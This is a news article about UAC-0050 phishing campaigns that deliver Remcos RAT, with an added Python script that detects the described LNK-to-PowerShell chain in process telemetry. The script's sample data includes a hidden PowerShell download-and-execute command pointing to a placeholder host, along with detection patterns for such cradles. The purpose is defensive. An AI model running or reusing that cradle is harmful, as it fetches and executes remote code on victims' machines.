Remcos RAT: a new weapon for hackers from UAC-0050 in cyber warfare

Brother

The systems of many European organizations have fallen in the battle over data.

The hacker group known as UAC-0050 is actively using phishing attacks to distribute the Remcos RAT malware. The tool is built for remote control and surveillance of a victim's machine and plays a key role in the group's espionage arsenal, according to security researchers at Uptycs.

Since 2020, UAC-0050 has been attacking Ukrainian and Polish organizations, relying on social engineering and impersonating legitimate organizations. In February, cybersecurity agencies of the targeted countries linked the group to a phishing campaign delivering Remcos RAT.

The Uptycs analysis, published on January 3, is based on an LNK file discovered in late December that checks the infected computer for installed antivirus software. The shortcut launches a PowerShell script that downloads and runs Remcos RAT, which can collect system data and harvest saved login credentials from web browsers such as Internet Explorer, Mozilla Firefox, and Google Chrome.
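As an added example (not code from the Uptycs report or from the original post), the following Python script scores process-creation events for the chain described above: PowerShell spawned from an LNK double-click (parent explorer.exe), a download-and-execute cradle on the command line, antivirus enumeration, and hidden-window flags. The event lines are constructed for this example in a simplified Sysmon-style JSON layout; the WMI SecurityCenter2 query used for the antivirus check, the staging URL and the scoring threshold are assumptions for illustration, not details taken from the report.

```python
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Constructed sample telemetry (Sysmon Event ID 1 style, reduced to a few
# fields and serialized as JSON lines). Not real logs from the campaign.
_RAW_EVENTS = [
    {   # LNK double-click: explorer.exe spawns a hidden PowerShell that checks
        # for AV via WMI (assumed method) and pulls a second stage into memory.
        "pid": 4120,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmd": r'''powershell.exe -w hidden -nop -c "Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct; IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"''',
    },
    {   # Scheduled admin script: not launched from explorer, no cradle.
        "pid": 5016,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # User opened an interactive console from the Start menu.
        "pid": 5200,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmd": "powershell.exe",
    },
    {   # Unrelated process, ignored by the rule.
        "pid": 5310,
        "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmd": "firefox.exe",
    },
]
SAMPLE_EVENTS = [json.dumps(e) for e in _RAW_EVENTS]

# Download-and-execute cradle markers commonly seen in PowerShell stagers.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"net\.webclient|invoke-expression|\biex\b|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)
# Assumed AV-enumeration method (WMI SecurityCenter2); the report does not
# state how the LNK performs its antivirus check.
AV_ENUM = re.compile(r"securitycenter2|antivirusproduct", re.IGNORECASE)
HIDDEN_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-noprofile\b|-noninteractive\b",
    re.IGNORECASE,
)
LNK_PARENT = re.compile(r"\\explorer\.exe$", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent: str
    cmd: str


def parse_event(line: str) -> ProcEvent:
    """Parse one JSON-line event into a ProcEvent."""
    d = json.loads(line)
    return ProcEvent(int(d["pid"]), d["image"], d["parent"], d["cmd"])


def score_event(ev: ProcEvent) -> list[str]:
    """Return the suspicious traits found on a PowerShell launch; len() is the score."""
    reasons: list[str] = []
    if not ev.image.lower().endswith("powershell.exe"):
        return reasons
    if LNK_PARENT.search(ev.parent):
        reasons.append("spawned by explorer.exe (consistent with an LNK double-click)")
    if DOWNLOAD_CRADLE.search(ev.cmd):
        reasons.append("download/execute cradle in command line")
    if AV_ENUM.search(ev.cmd):
        reasons.append("antivirus enumeration via SecurityCenter2")
    if HIDDEN_FLAGS.search(ev.cmd):
        reasons.append("hidden-window / no-profile flags")
    return reasons


def hunt(lines, threshold: int = 2):
    """Return [(pid, reasons, urls)] for events with at least `threshold` traits.
    The threshold is an assumption for this example: a single trait (an
    interactive console opened from the Start menu) is normal user activity.
    URLs found on a flagged command line are extracted as triage indicators."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev.pid, reasons, URL.findall(ev.cmd)))
    return hits


if __name__ == "__main__":
    for pid, reasons, urls in hunt(SAMPLE_EVENTS):
        print(f"pid {pid}: " + "; ".join(reasons) + f" | urls: {urls}")
```

Only the first constructed event is flagged; the interactive console launched from explorer.exe scores one trait and stays below the threshold, which is the distinction a command-line-only "powershell.exe from explorer" rule would miss.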

Over the past few months the same Trojan has been used in at least three separate phishing waves, one of which also led to the deployment of an information stealer called Meduza Stealer.

One of the group's new tactics is the use of so-called unnamed (anonymous) pipes in Windows to pass data between processes, which lets the malware quietly evade endpoint detection and response (EDR) systems and antivirus products. Anonymous pipes are a standard Windows inter-process communication mechanism used by plenty of legitimate software, so the pipe itself is not an indicator; what matters for detection is which processes are exchanging data and what they go on to do.

The researchers note that although the technique itself is not new, its adoption points to a marked increase in the sophistication of UAC-0050's tradecraft.